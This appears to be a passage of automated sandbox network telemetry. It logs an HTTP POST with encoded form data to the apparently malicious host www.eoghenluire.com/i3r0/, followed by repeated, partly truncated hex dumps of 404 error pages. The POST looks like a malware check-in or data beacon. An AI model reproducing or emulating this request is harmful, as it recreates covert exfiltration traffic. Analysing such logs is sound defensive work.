            Source: unknownHTTP traffic detected: POST /i3r0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 205Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeHost: www.eoghenluire.comOrigin: http://www.eoghenluire.comReferer: http://www.eoghenluire.com/i3r0/User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 54 6f 72 65 75 77 35 6e 35 36 69 73 57 6e 78 46 2b 6f 56 69 32 36 6a 59 6e 53 69 2b 69 2b 31 36 78 4e 4a 74 72 4b 69 74 4d 4e 30 6b 52 36 38 51 73 6d 4d 77 70 48 57 49 52 49 75 54 69 53 33 2b 65 55 4d 42 66 6e 5a 56 63 62 52 55 4c 59 41 4b 42 59 77 6e 6d 2f 44 4d 31 55 43 4c 46 36 70 44 38 63 70 78 48 4c 34 4c 2f 2b 6f 4f 69 73 77 6b 51 43 5a 32 32 71 62 43 52 4b 65 49 64 53 70 79 42 75 53 61 53 65 7a 42 50 43 70 4f 2f 46 4a 50 6b 46 31 31 52 67 74 51 54 48 58 2f 30 6d 2f 63 77 30 2b 6f 75 67 39 69 75 63 30 6b 71 56 4b 6c 31 76 77 6d 2b 77 3d 3d Data Ascii: TvpPfhGp=7yYtcCmE3ZnPToreuw5n56isWnxF+oVi26jYnSi+i+16xNJtrKitMN0kR68QsmMwpHWIRIuTiS3+eUMBfnZVcbRULYAKBYwnm/DM1UCLF6pD8cpxHL4L/+oOiswkQCZ22qbCRKeIdSpyBuSaSezBPCpO/FJPkF11RgtQTHX/0m/cw0+oug9iuc0kqVKl1vwm+w==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:00 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:03 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:05 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:08 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0+sha-aaf97e5x-version: aaf97e5x-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Wed, 03 Jul 2024 13:57:08 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:57:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 13:57:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
